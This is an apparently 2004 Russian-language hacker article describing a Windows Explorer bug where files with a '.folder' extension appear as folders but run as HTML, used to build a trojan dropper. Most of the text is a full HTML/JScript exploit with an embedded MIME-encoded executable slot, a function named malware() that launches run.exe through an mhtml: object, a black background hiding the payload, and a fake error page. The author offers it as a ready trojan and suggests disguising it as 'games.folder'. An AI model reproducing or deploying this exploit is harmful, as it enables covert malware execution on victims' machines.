Заполночь, какие-то абстрактные мысли в
голове, ни одной конструктивной идеи, лишь
желание сделать что-нибудь полезное... И тут
мне вспомнилась одна очень интересная и не
заслужено забытая бага Windows Explorer'a о которой
я вам и поведаю. Злоключается сие в
следующем, если какому-либо файлу задать
расширение folder, то эксплорер его отобразит
со значком папки. Но это само по себе ничего
бы не дало, если бы данный файл не
исполнялся системой как HTML сценарий.
Немножко подумав, как это можно
использовать, решил воспользоваться
сценарием для исполнения MIME кодированого
бинарника из тела документа. Исходник был
взят из статьи "Запуск exe файла через html
страницу" (с) The Neption (зачем изобретать
велосипед) и слегка переработан. Вот
результат:

<html> <!-- здесь этот тег
обязателен(в отличии от оригинала) -->
MIME-Version: 1.0
Content-Location:file:///run.exe
Content-Transfer-Encoding: base64

[BINARY TEXT]

<title>Welcome - Home</title>
<body bgcolor=black scroll=no> <!-- скрываем MIME код за
счет черного фона-->
<SCRIPT>
function malware()
{
s=document.URL;path= s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( '<object style="cursor:cross-hair" alt="Sorry,
Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666"
CODEBASE="mhtml:'+path+'\\docs.folder!file:///run.exe"></object><!--
Запускем бинарник -->
<title>Error</title> <body scroll=no bgcolor=black> <center><h1><FONT
color=red>Sorry, Error On This Page! <br> Please Open With Internet
Explorer</h1></center>><!-- выводим текст -->')
}setTimeout("malware()",150)
</script>
</body>
</html>

В сценарий достаточно подставить MIME-кодированый
бинарник (кодировать можно любым почтовым
клиентом, подробно об этом рассказано в
вышеупомянутой статье The Neption'а) и троян
готов, как применить - придумайте сами. Я
выложил данное чудо на локальный сервак с
наванием games.folder 😉

P.S. Все тесты проводились в WinXP sp1, вполне
вероятно, что и другие OS семейства Windows
имеют такую же недоработку.

(с) 2004 by Stealth[SST] (Stealth@sunlim.net) Наш сайт: http://www.sunlimited.ru

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии